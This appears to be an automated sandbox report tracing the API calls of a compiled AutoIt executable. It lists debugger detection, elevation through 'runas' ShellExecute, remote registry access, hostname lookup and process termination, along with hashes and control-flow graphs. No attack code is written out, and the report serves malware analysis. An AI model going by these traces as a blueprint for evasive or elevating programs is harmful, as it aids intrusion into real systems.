RegQueryValueExW 66551->66555 66552->66558 66557 b632f7 66553->66557 66554->66558 66559 b63331 66554->66559 66555->66540 66555->66558 66560 b6329f RegQueryValueExW 66556->66560 66561 b084a6 81 API calls 66557->66561 66558->66540 66562 b0ca8e 48 API calls 66559->66562 66560->66558 66563 b6330c RegQueryValueExW 66561->66563 66562->66558 66563->66558 66563->66559 66565 b1f48a 66564->66565 66566 b1f47f 66564->66566 66569 b084a6 81 API calls 66565->66569 66600 b1f498 Mailbox 66565->66600 66567 b0cdb4 48 API calls 66566->66567 66567->66565 66568 b2010a 48 API calls 66570 b1f49f 66568->66570 66571 b76841 66569->66571 66572 b1f4af 66570->66572 66998 b05080 49 API calls 66570->66998 66573 b2297d __wsplitpath 47 API calls 66571->66573 66576 b084a6 81 API calls 66572->66576 66575 b76859 66573->66575 66578 b0caee 48 API calls 66575->66578 66577 b1f4bf 66576->66577 66579 b04bf9 56 API calls 66577->66579 66580 b7686a 66578->66580 66581 b1f4ce 66579->66581 66999 b039e8 48 API calls 2 library calls 66580->66999 66583 b768d4 GetLastError 66581->66583 66594 b1f4d6 66581->66594 66586 b768ed 66583->66586 66584 b76878 66585 b76895 66584->66585 67000 b46f4b GetFileAttributesW FindFirstFileW FindClose 66584->67000 66587 b0cdb4 48 API calls 66585->66587 66586->66594 67001 b04592 FindCloseChangeNotification 66586->67001 66587->66600 66588 b1f4f0 66591 b2010a 48 API calls 66588->66591 66589 b76920 66592 b2010a 48 API calls 66589->66592 66595 b1f4f5 66591->66595 66596 b76925 66592->66596 66593 b76888 66593->66585 66599 b46d6d 52 API calls 66593->66599 66594->66588 66594->66589 66598 b0197e 48 API calls 66595->66598 66601 b1f50a Mailbox 66598->66601 66599->66585 66600->66568 66600->66601 66601->66159 66603 b019ee 83 API calls 66602->66603 66604 b6799b 66603->66604 66605 b01dce 107 API calls 66604->66605 66606 b679a4 66605->66606 66606->66159 67002 b1dd92 GetFileAttributesW 66607->67002 66610->66171 66611->66159 66612->66159 66613->66159 66614->66159 66615->66159 66616->66144 66617->66140 66618->66170 66619->66158 66620->66164 66621->66156 66622->66167 66624 b084a6 81 API calls 66623->66624 66625 b5f7db 66624->66625 66630 b5f81d Mailbox 66625->66630 66659 b60458 66625->66659 66627 b5fa7c 66628 b5fbeb 66627->66628 66634 b5fa86 66627->66634 66694 b60579 89 API calls Mailbox 66628->66694 66630->66195 66632 b5f875 Mailbox 66632->66627 66632->66630 66635 b084a6 81 API calls 66632->66635 66690 b628d9 48 API calls _memmove 66632->66690 66691 b5fc96 60 API calls 2 library calls 66632->66691 66633 b5fbf8 66633->66634 66636 b5fc04 66633->66636 66672 b5f5fb 66634->66672 66635->66632 66636->66630 66641 b5faba 66686 b1f92c 66641->66686 66644 b5fad4 66692 b4d520 86 API calls 4 library calls 66644->66692 66645 b5faee 66647 b03320 48 API calls 66645->66647 66649 b5fb05 66647->66649 66648 b5fadf GetCurrentProcess TerminateProcess 66648->66645 66651 b114a0 48 API calls 66649->66651 66658 b5fb2f 66649->66658 66650 b5fc56 66650->66630 66655 b5fc6f FreeLibrary 66650->66655 66652 b5fb1e 66651->66652 66693 b60300 105 API calls _free 66652->66693 66654 b114a0 48 API calls 66654->66658 66655->66630 66657 b0d89e 50 API calls 66657->66658 66658->66650 66658->66654 66658->66657 66695 b60300 105 API calls _free 66658->66695 66660 b0b8a7 48 API calls 66659->66660 66661 b60473 CharLowerBuffW 66660->66661 66662 b5267a 60 API calls 66661->66662 66663 b60494 66662->66663 66665 b0d3d2 48 API calls 66663->66665 66670 b604cf Mailbox 66663->66670 66666 b604ac 66665->66666 66667 b07f40 48 API calls 66666->66667 66668 b604c3 66667->66668 66669 b0a2fb 48 API calls 66668->66669 66669->66670 66671 b6050b Mailbox 66670->66671 66696 b5fc96 60 API calls 2 library calls 66670->66696 66671->66632 66673 b5f616 66672->66673 66674 b5f66b 66672->66674 66675 b2010a 48 API calls 66673->66675 66678 b60719 66674->66678 66677 b5f638 66675->66677 66676 b2010a 48 API calls 66676->66677 66677->66674 66677->66676 66679 b60944 Mailbox 66678->66679 66685 b6073c _strcat _wcscpy __wsetenvp 66678->66685 66679->66641 66680 b0d00b 58 API calls 66680->66685 66681 b0cdb4 48 API calls 66681->66685 66682 b084a6 81 API calls 66682->66685 66683 b245ec 47 API calls __crtLCMapStringA_stat 66683->66685 66685->66679 66685->66680 66685->66681 66685->66682 66685->66683 66697 b48932 50 API calls __wsetenvp 66685->66697 66688 b1f941 66686->66688 66687 b1f9d9 select 66689 b1f9a7 66687->66689 66688->66687 66688->66689 66689->66644 66689->66645 66690->66632 66691->66632 66692->66648 66693->66658 66694->66633 66695->66658 66696->66671 66697->66685 66699 b2010a 48 API calls 66698->66699 66700 b4a675 66699->66700 66701 b0a6f8 48 API calls 66700->66701 66702 b4a682 66701->66702 66702->66214 66704 b080f9 66703->66704 66705 b0816b 66703->66705 66704->66705 66707 b08105 66704->66707 66706 b0a2fb 48 API calls 66705->66706 66708 b0813a _memmove 66706->66708 66709 b08110 66707->66709 66710 b08163 66707->66710 66708->66224 66712 b0a6f8 48 API calls 66709->66712 66735 b07eda 48 API calls 66710->66735 66713 b0811a 66712->66713 66714 b2010a 48 API calls 66713->66714 66714->66708 66716 b724df 66715->66716 66717 b0c638 66715->66717 66719 b0c4cd 48 API calls 66716->66719 66718 b2010a 48 API calls 66717->66718 66720 b0c64f MultiByteToWideChar 66718->66720 66721 b724e7 66719->66721 66722 b0c6b7 66720->66722 66723 b0c66c 66720->66723 66727 b0a6f8 48 API calls 66721->66727 66724 b0a2fb 48 API calls 66722->66724 66723->66722 66725 b0c675 66723->66725 66726 b0c6c3 66724->66726 66725->66721 66730 b0c686 66725->66730 66726->66232 66728 b724f6 66727->66728 66729 b2010a 48 API calls 66728->66729 66731 b72518 66729->66731 66732 b0c68e _memmove 66730->66732 66733 b2010a 48 API calls 66730->66733 66732->66232 66733->66732 66734->66232 66735->66708 66736->66252 66737->66254 66739 b1f057 66738->66739 66740 b1f069 66738->66740 66741 b1f063 66739->66741 66742 b1f05d 66739->66742 66743 b0c4cd 48 API calls 66740->66743 66745 b0a6d4 48 API calls 66741->66745 66744 b0a6d4 48 API calls 66742->66744 66754 b464f5 66743->66754 66747 b1f081 66744->66747 66748 b4668b 66745->66748 66746 b46524 66746->66297 66767 b04c4f 66747->66767 66751 b04c4f 50 API calls 66748->66751 66752 b46699 66751->66752 66760 b466a9 Mailbox 66752->66760 66775 b46765 50 API calls 66752->66775 66754->66746 66773 b4649b ReadFile SetFilePointerEx 66754->66773 66774 b0bd2f 48 API calls _memmove 66754->66774 66755 b749b2 66758 b0c610 50 API calls 66759 b1f0a3 Mailbox 66758->66759 66759->66297 66760->66297 66761->66272 66762->66301 66763->66270 66764->66273 66765->66292 66766->66299 66768 b1f324 48 API calls 66767->66768 66771 b04c60 66768->66771 66769 b04c95 66769->66755 66769->66758 66770 b04ca0 2 API calls 66770->66771 66771->66769 66771->66770 66776 b04d29 66771->66776 66773->66754 66774->66754 66775->66760 66777 b745cf 66776->66777 66778 b04d3d 66776->66778 66780 b0a6f8 48 API calls 66777->66780 66785 b04d67 66778->66785 66782 b745da 66780->66782 66781 b04d49 66781->66771 66783 b2010a 48 API calls 66782->66783 66784 b745ef _memmove 66783->66784 66786 b04d78 _memmove 66785->66786 66787 b04d7d 66785->66787 66786->66781 66788 b74703 66787->66788 66789 b2010a 48 API calls 66787->66789 66789->66786 66790->66317 66791->66324 66792->66324 66793->66345 66794->66339 66795->66324 66796->66337 66798 b56b25 GetWindowRect 66797->66798 66799 b56b42 66797->66799 66800 b56b5c 66798->66800 66799->66800 66801 b56b52 ClientToScreen 66799->66801 66800->66349 66800->66352 66801->66800 66802->66355 66803->66359 66812 b5ae3b 66804->66812 66807 b5ad05 Mailbox 66808 b5ad31 htons 66807->66808 66809 b5ad1b 66807->66809 66808->66809 66809->66366 66811 b4d7f2 66810->66811 66811->66373 66813 b0a6d4 48 API calls 66812->66813 66814 b5ae49 66813->66814 66817 b5ae79 WideCharToMultiByte 66814->66817 66816 b5acf3 inet_addr 66816->66807 66818 b5aea7 66817->66818 66819 b5ae9d 66817->66819 66821 b2010a 48 API calls 66818->66821 66820 b1f324 48 API calls 66819->66820 66824 b5aea5 66820->66824 66822 b5aeae WideCharToMultiByte 66821->66822 66823 b1f2d0 48 API calls 66822->66823 66823->66824 66824->66816 66825->66378 66826->66440 66827->66440 66828->66427 66829->66427 66830->66440 66831->66445 66832->66448 66833->66406 66834->66432 66835->66473 66836->66475 66837->66477 66839 b47700 66838->66839 66847 b476f9 _wcsncpy 66838->66847 66840 b2010a 48 API calls 66839->66840 66841 b47706 GetFileVersionInfoW 66840->66841 66842 b47722 __wsetenvp 66841->66842 66843 b2010a 48 API calls 66842->66843 66848 b47739 _wcscat _wcscmp _wcscpy _wcsstr 66843->66848 66844 b21bc7 _W_store_winword 59 API calls 66845 b477f7 66844->66845 66846 b47827 74D41560 66845->66846 66845->66847 66846->66847 66850 b4783d _wcscmp 66846->66850 66847->66485 66849 b47779 74D41560 66848->66849 66852 b47793 _wcscat 66848->66852 66849->66852 66850->66847 66853 b2234b 80 API calls 3 library calls 66850->66853 66852->66844 66853->66847 66855 b0d89e 50 API calls 66854->66855 66856 b01a08 66855->66856 66857 b01a12 66856->66857 66858 b7db7d 66856->66858 66860 b084a6 81 API calls 66857->66860 66859 b07e53 48 API calls 66858->66859 66862 b7db8d 66859->66862 66861 b01a1f 66860->66861 66863 b0c935 48 API calls 66861->66863 66862->66862 66864 b01a2d 66863->66864 66865 b01dce 66864->66865 66866 b01de4 Mailbox 66865->66866 66867 b7db26 66866->66867 66869 b01dfd 66866->66869 66868 b7db2b IsWindow 66867->66868 66871 b01e51 66868->66871 66872 b7db3f 66868->66872 66870 b01e46 66869->66870 66873 b084a6 81 API calls 66869->66873 66870->66871 66876 b7db65 IsWindow 66870->66876 66871->66501 66871->66502 66950 b0200a 66872->66950 66877 b01e17 66873->66877 66876->66871 66876->66872 66897 b01f04 66877->66897 66878 b0197e 48 API calls 66878->66871 66881 b0c4cd 48 API calls 66880->66881 66882 b3e2fe 66881->66882 66989 b0193b SendMessageTimeoutW 66882->66989 66884 b3e305 66896 b3e309 Mailbox 66884->66896 66990 b3e390 66884->66990 66886 b3e314 66887 b2010a 48 API calls 66886->66887 66888 b3e338 SendMessageW 66887->66888 66889 b3e34e _strlen 66888->66889 66888->66896 66890 b3e35a 66889->66890 66891 b3e378 66889->66891 66995 b3e0f5 48 API calls 2 library calls 66890->66995 66893 b07e53 48 API calls 66891->66893 66893->66896 66894 b3e362 66895 b0c610 50 API calls 66894->66895 66895->66896 66896->66507 66898 b01f1a Mailbox 66897->66898 66899 b0c935 48 API calls 66898->66899 66900 b01f3e 66899->66900 66901 b0c935 48 API calls 66900->66901 66902 b01f49 66901->66902 66903 b07e53 48 API calls 66902->66903 66904 b01f59 66903->66904 66905 b0d3d2 48 API calls 66904->66905 66906 b01f87 66905->66906 66907 b0d3d2 48 API calls 66906->66907 66908 b01f90 66907->66908 66909 b0d3d2 48 API calls 66908->66909 66910 b01f99 66909->66910 66911 b72569 66910->66911 66912 b01fac 66910->66912 66954 b3e4ea 60 API calls 3 library calls 66911->66954 66913 b72583 66912->66913 66915 b01fbe GetForegroundWindow 66912->66915 66916 b0a4f6 48 API calls 66913->66916 66917 b0200a 48 API calls 66915->66917 66918 b72597 66916->66918 66919 b01fcc 66917->66919 66920 b72899 66918->66920 66923 b0a4f6 48 API calls 66918->66923 66921 b0197e 48 API calls 66919->66921 66922 b728ab 66920->66922 66924 b0c935 48 API calls 66920->66924 66944 b01fe1 Mailbox 66921->66944 66926 b0b8a7 48 API calls 66922->66926 66927 b728d6 66922->66927 66949 b725ad 66923->66949 66924->66922 66925 b728f1 66930 b728ce CharUpperBuffW 66926->66930 66927->66925 66932 b0b8a7 48 API calls 66927->66932 66930->66927 66939 b72842 GetForegroundWindow 66943 b7283c 66939->66943 66940 b7281d 66941 b7282a IsWindow 66940->66941 66941->66943 66941->66944 66942 b0200a 48 API calls 66942->66943 66943->66939 66943->66942 66943->66944 66944->66870 66945 b0c935 48 API calls 66945->66949 66947 b05cf6 47 API calls 66947->66949 66948 b22241 48 API calls 66948->66949 66949->66920 66949->66940 66949->66943 66949->66944 66949->66945 66949->66947 66949->66948 66955 b3d68d 49 API calls 66949->66955 66956 b05be9 61 API calls 66949->66956 66951 b02016 66950->66951 66952 b2010a 48 API calls 66951->66952 66953 b02023 66952->66953 66953->66878 66954->66913 66955->66949 66956->66949 66989->66884 66996 b0193b SendMessageTimeoutW 66990->66996 66992 b3e39a 66993 b3e3a2 SendMessageW 66992->66993 66994 b3e39e 66992->66994 66993->66886 66994->66886 66995->66894 66996->66992 66997->66546 66998->66572 66999->66584 67000->66593 67001->66594 67003 b1dd89 67002->67003 67004 b74a7d FindFirstFileW 67002->67004 67003->66159 67005 b74a95 FindClose 67004->67005 67006 b74a8e 67004->67006 67006->67005 67007 b1e306 67008 b1e30a 67007->67008 67010 b1e1e3 67007->67010 67009 b1e28d 67010->67009 67013 b478ee WSAStartup 67010->67013 67012 b7c066 67014 b47917 gethostname gethostbyname 67013->67014 67015 b479b1 _wcscpy 67013->67015 67014->67015 67016 b4793a _memmove 67014->67016 67015->67012 67017 b47952 _wcscpy 67016->67017 67018 b47970 inet_ntoa 67016->67018 67019 b479a9 WSACleanup 67017->67019 67020 b47989 _strcat 67018->67020 67019->67015 67022 b48553 67020->67022 67023 b48561 67022->67023 67025 b48565 _strlen 67022->67025 67023->67017 67024 b48574 MultiByteToWideChar 67024->67023 67026 b4858a 67024->67026 67025->67024 67027 b2010a 48 API calls 67026->67027 67028 b485a6 MultiByteToWideChar 67027->67028 67028->67023 67029 b0e849 67032 b126c0 67029->67032 67031 b0e852 67033 b7862d 67032->67033 67034 b1273b 67032->67034 67154 b4d520 86 API calls 4 library calls 67033->67154 67036 b12adc 67034->67036 67037 b1277c 67034->67037 67049 b1279a 67034->67049 67153 b0d349 53 API calls 67036->67153 67075 b128f6 67037->67075 67149 b0d500 53 API calls __cinit 67037->67149 67038 b7863e 67155 b4d520 86 API calls 4 library calls 67038->67155 67039 b12a84 67046 b0d380 55 API calls 67039->67046 67040 b127cf 67040->67038 67042 b127db 67040->67042 67044 b127ef 67042->67044 67056 b7865a 67042->67056 67047 b12806 67044->67047 67048 b786c9 67044->67048 67050 b12aab 67046->67050 67051 b0fa40 339 API calls 67047->67051 67052 b78ac9 67048->67052 67055 b0fa40 339 API calls 67048->67055 67049->67039 67049->67040 67060 b12914 67049->67060 67054 b0d2d2 53 API calls 67050->67054 67088 b1281d 67051->67088 67170 b4d520 86 API calls 4 library calls 67052->67170 67054->67060 67057 b786ee 67055->67057 67056->67048 67080 b129ec 67056->67080 67156 b5f211 339 API calls 67056->67156 67157 b5f4df 339 API calls 67056->67157 67062 b0d89e 50 API calls 67057->67062 67069 b7870a 67057->67069 67057->67080 67059 b78980 67165 b4d520 86 API calls 4 library calls 67059->67165 67063 b0cdb4 48 API calls 67060->67063 67061 b12836 67061->67052 67066 b0fa40 339 API calls 67061->67066 67062->67069 67071 b1296e 67063->67071 67090 b1287c 67066->67090 67067 b0c935 48 API calls 67067->67061 67068 b128cc 67068->67075 67150 b0cf97 58 API calls 67068->67150 67073 b7878d 67069->67073 67158 b0346e 48 API calls 67069->67158 67071->67080 67081 b12984 67071->67081 67086 b78a97 67071->67086 67093 b789b4 67071->67093 67072 b128ac 67072->67068 67163 b0cf97 58 API calls 67072->67163 67074 b7883f 67073->67074 67079 b7882d 67073->67079 67159 b44e71 53 API calls __cinit 67073->67159 67161 b5c235 339 API calls Mailbox 67074->67161 67085 b12900 67075->67085 67164 b0cf97 58 API calls 67075->67164 67082 b0ca8e 48 API calls 67079->67082 67080->67031 67081->67086 67151 b141fc 84 API calls 67081->67151 67082->67074 67083 b78888 67087 b7888c 67083->67087 67083->67088 67085->67059 67085->67060 67086->67080 67169 b04b02 50 API calls 67086->67169 67162 b4d520 86 API calls 4 library calls 67087->67162 67088->67061 67088->67067 67088->67080 67090->67072 67090->67080 67096 b0fa40 339 API calls 67090->67096 67135 b5bf80 67093->67135 67095 b129b8 67097 b78a7e 67095->67097 67152 b141fc 84 API calls 67095->67152 67104 b788ff 67096->67104 67168 b1ee93 84 API calls 67097->67168 67098 b78725 67098->67079 67111 b114a0 48 API calls 67098->67111 67100 b789f3 67112 b78a42 67100->67112 67113 b78a01 67100->67113 67101 b787ca 67102 b78813 67101->67102 67106 b084a6 81 API calls 67101->67106 67108 b0d89e 50 API calls 67102->67108 67104->67080 67109 b0d89e 50 API calls 67104->67109 67123 b787e0 67106->67123 67107 b129ca 67107->67080 67114 b129e5 67107->67114 67115 b78a6f 67107->67115 67110 b78821 67108->67110 67109->67072 67116 b0d89e 50 API calls 67110->67116 67117 b7875d 67111->67117 67119 b0d89e 50 API calls 67112->67119 67118 b0ca8e 48 API calls 67113->67118 67121 b2010a 48 API calls 67114->67121 67167 b5d1da 50 API calls 67115->67167 67116->67079 67117->67079 67124 b114a0 48 API calls 67117->67124 67118->67080 67122 b78a4b 67119->67122 67121->67080 67125 b0d89e 50 API calls 67122->67125 67123->67102 67160 b4a76d 49 API calls 67123->67160 67127 b78775 67124->67127 67129 b78a57 67125->67129 67128 b0d89e 50 API calls 67127->67128 67131 b78781 67128->67131 67166 b04b02 50 API calls 67129->67166 67130 b78807 67133 b0d89e 50 API calls 67130->67133 67134 b0d89e 50 API calls 67131->67134 67133->67102 67134->67073 67140 b5bfd9 _memset 67135->67140 67137 b5c22e 67137->67100 67138 b5c14c 67139 b5c19f VariantInit VariantClear 67138->67139 67146 b5c033 67138->67146 67141 b5c1c5 67139->67141 67140->67138 67142 b5c097 VariantInit 67140->67142 67140->67146 67143 b5c1e6 67141->67143 67141->67146 67147 b5c0d6 67142->67147 67172 b4a6f6 103 API calls 67143->67172 67145 b5c20d VariantClear 67145->67137 67173 b5c235 339 API calls Mailbox 67146->67173 67147->67146 67171 b4a6f6 103 API calls 67147->67171 67149->67049 67150->67075 67151->67095 67152->67107 67153->67072 67154->67038 67155->67056 67156->67056 67157->67056 67158->67098 67159->67101 67160->67130 67161->67083 67162->67080 67163->67068 67164->67085 67165->67080 67166->67080 67167->67097 67168->67086 67169->67052 67170->67080 67171->67138 67172->67145 67173->67137 67174 b13588 67189 b1308b 67174->67189 67175 b135b0 67199 b0203a 339 API calls 67175->67199 67176 b5d154 48 API calls 67176->67189 67179 b13217 67191 b1322a 67179->67191 67207 b4d520 86 API calls 4 library calls 67179->67207 67180 b7848d 67204 b4d520 86 API calls 4 library calls 67180->67204 67181 b131dc 67181->67179 67181->67191 67196 b784b0 67181->67196 67184 b03320 48 API calls 67184->67189 67188 b78478 67203 b4d520 86 API calls 4 library calls 67188->67203 67189->67175 67189->67176 67189->67180 67189->67181 67189->67184 67189->67188 67192 b13665 67189->67192 67193 b0fa40 339 API calls 67189->67193 67194 b784a4 67189->67194 67197 b135f0 67189->67197 67200 b3a599 InterlockedDecrement 67189->67200 67201 b0346e 48 API calls 67189->67201 67202 b4d520 86 API calls 4 library calls 67192->67202 67193->67189 67205 b4d520 86 API calls 4 library calls 67194->67205 67206 b4d520 86 API calls 4 library calls 67196->67206 67198 b0c935 48 API calls 67197->67198 67198->67181 67199->67181 67200->67189 67201->67189 67202->67191 67203->67191 67204->67191 67205->67196 67206->67191 67207->67191 67208 b1e44f 67209 b2010a 48 API calls 67208->67209 67210 b1e457 67209->67210 67211 b1e46b 67210->67211 67215 b1e74b 67210->67215 67216 b1e754 67215->67216 67217 b1e463 67215->67217 67247 b21b2a 52 API calls __cinit 67216->67247 67219 b1e47b 67217->67219 67220 b0d3d2 48 API calls 67219->67220 67221 b1e492 GetVersionExW 67220->67221 67222 b07e53 48 API calls 67221->67222 67223 b1e4d5 67222->67223 67248 b1e5f8 67223->67248 67226 b1e617 48 API calls 67232 b1e4e9 67226->67232 67229 b729f9 67230 b1e576 67234 b1e5ec GetSystemInfo 67230->67234 67235 b1e59e 67230->67235 67231 b1e55f GetCurrentProcess 67261 b1e70e LoadLibraryA GetProcAddress 67231->67261 67232->67229 67252 b1e6d1 67232->67252 67236 b1e5c9 67234->67236 67255 b1e694 67235->67255 67239 b1e5d7 FreeLibrary 67236->67239 67240 b1e5dc 67236->67240 67239->67240 67240->67211 67241 b1e5e4 GetSystemInfo 67244 b1e5be 67241->67244 67242 b1e5b4 67258 b1e437 67242->67258 67244->67236 67246 b1e5c4 FreeLibrary 67244->67246 67246->67236 67247->67217 67249 b1e601 67248->67249 67250 b0a2fb 48 API calls 67249->67250 67251 b1e4dd 67250->67251 67251->67226 67262 b1e6e3 67252->67262 67266 b1e6a6 67255->67266 67259 b1e694 2 API calls 67258->67259 67260 b1e43f GetNativeSystemInfo 67259->67260 67260->67244 67261->67230 67263 b1e55b 67262->67263 67264 b1e6ec LoadLibraryA 67262->67264 67263->67230 67263->67231 67264->67263 67265 b1e6fd GetProcAddress 67264->67265 67265->67263 67267 b1e5ac 67266->67267 67268 b1e6af LoadLibraryA 67266->67268 67267->67241 67267->67242 67268->67267 67269 b1e6c0 GetProcAddress 67268->67269 67269->67267

                          Executed Functions

                          Function 00B0374E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 145windowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00B0376D
                            • Part of subcall function 00B04257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\bf-p2b.exe,00000104,?,00000000,00000001,00000000), ref: 00B0428C
                          • IsDebuggerPresent.KERNEL32(?,?), ref: 00B0377F
                          • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\bf-p2b.exe,00000104,?,00BC1120,C:\Users\user\Desktop\bf-p2b.exe,00BC1124,?,?), ref: 00B037EE
                            • Part of subcall function 00B034F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00B0352A
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B03860
                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00BB2934,00000010), ref: 00B721C5
                          • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00B721FD
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00B72232
                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B9DAA4), ref: 00B72290
                          • ShellExecuteW.SHELL32(00000000), ref: 00B72297
                            • Part of subcall function 00B030A5: GetSysColorBrush.USER32(0000000F), ref: 00B030B0
                            • Part of subcall function 00B030A5: LoadCursorW.USER32(00000000,00007F00), ref: 00B030BF
                            • Part of subcall function 00B030A5: LoadIconW.USER32(00000063), ref: 00B030D5
                            • Part of subcall function 00B030A5: LoadIconW.USER32(000000A4), ref: 00B030E7
                            • Part of subcall function 00B030A5: LoadIconW.USER32(000000A2), ref: 00B030F9
                            • Part of subcall function 00B030A5: RegisterClassExW.USER32(?), ref: 00B03167
                            • Part of subcall function 00B02E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00B02ECB
                            • Part of subcall function 00B02E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B02EEC
                            • Part of subcall function 00B02E9D: ShowWindow.USER32(00000000), ref: 00B02F00
                            • Part of subcall function 00B02E9D: ShowWindow.USER32(00000000), ref: 00B02F09
                            • Part of subcall function 00B03598: _memset.LIBCMT ref: 00B035BE
                            • Part of subcall function 00B03598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B03667
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                          • String ID: C:\Users\user\Desktop\bf-p2b.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                          • API String ID: 4253510256-2895751819
                          • Opcode ID: 4afdf09c4d0f09ed7cffb405fed3aeb4a331051d24469d79da16f208d0dd041c
                          • Instruction ID: 86eb24923c80478e6787f02cdf50635fb8a599f305e5e7c1db20297a8b0bc7e5
                          • Opcode Fuzzy Hash: 4afdf09c4d0f09ed7cffb405fed3aeb4a331051d24469d79da16f208d0dd041c
                          • Instruction Fuzzy Hash: 4A51F675644244BFDB10ABA4DC4AFAD3FECDB0AB00F0444DAF646B31E2DE604A45CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B630AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1168 b630ad-b6315b call b0ca8e call b0d3d2 * 3 call b084a6 call b63d7b call b63af7 1183 b63166-b63170 1168->1183 1184 b6315d-b63161 1168->1184 1186 b631a2 1183->1186 1187 b63172-b63187 RegConnectRegistryW 1183->1187 1185 b631e6-b631f2 call b4d7e4 1184->1185 1197 b63504-b63527 call b05cd3 * 3 1185->1197 1191 b631a6-b631c3 RegOpenKeyExW 1186->1191 1189 b6319c-b631a0 1187->1189 1190 b63189-b6319a call b07ba9 1187->1190 1189->1191 1190->1185 1192 b631f7-b63227 call b084a6 RegQueryValueExW 1191->1192 1193 b631c5-b631d7 call b07ba9 1191->1193 1206 b6323e-b63254 call b07ba9 1192->1206 1207 b63229-b63239 call b07ba9 1192->1207 1204 b631e3-b631e4 1193->1204 1205 b631d9-b631dd RegCloseKey 1193->1205 1204->1185 1205->1204 1214 b634dc-b634dd 1206->1214 1215 b6325a-b6325f 1206->1215 1217 b634df-b634e6 call b4d7e4 1207->1217 1214->1217 1218 b63265-b63268 1215->1218 1219 b6344c-b63498 call b2010a call b084a6 RegQueryValueExW 1215->1219 1225 b634eb-b634fc RegCloseKey 1217->1225 1222 b6326e-b63273 1218->1222 1223 b633d9-b63411 call b4ad14 call b084a6 RegQueryValueExW 1218->1223 1245 b634b4-b634ce call b07ba9 call b4d7e4 1219->1245 1246 b6349a-b634a6 1219->1246 1226 b6338d-b633d4 call b084a6 RegQueryValueExW call b12570 1222->1226 1227 b63279-b6327c 1222->1227 1223->1225 1248 b63417-b63447 call b07ba9 call b4d7e4 call b12570 1223->1248 1225->1197 1229 b634fe-b63502 RegCloseKey 1225->1229 1226->1225 1232 b632de-b6332b call b2010a call b084a6 RegQueryValueExW 1227->1232 1233 b6327e-b63281 1227->1233 1229->1197 1232->1245 1258 b63331-b63348 1232->1258 1233->1214 1237 b63287-b632d9 call b084a6 RegQueryValueExW call b12570 1233->1237 1237->1225 1264 b634d3-b634da call b2017e 1245->1264 1247 b634aa-b634b2 call b0ca8e 1246->1247 1247->1264 1248->1225 1258->1247 1263 b6334e-b63355 1258->1263 1266 b63357-b63358 1263->1266 1267 b6335c-b63361 1263->1267 1264->1225 1266->1267 1270 b63376-b6337b 1267->1270 1271 b63363-b63367 1267->1271 1270->1247 1276 b63381-b63388 1270->1276 1274 b63371-b63374 1271->1274 1275 b63369-b6336d 1271->1275 1274->1270 1274->1271 1275->1274 1276->1247
                          APIs
                            • Part of subcall function 00B63AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B62AA6,?,?), ref: 00B63B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B6317F
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 00B6321E
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B632B6
                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B634F5
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B63502
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
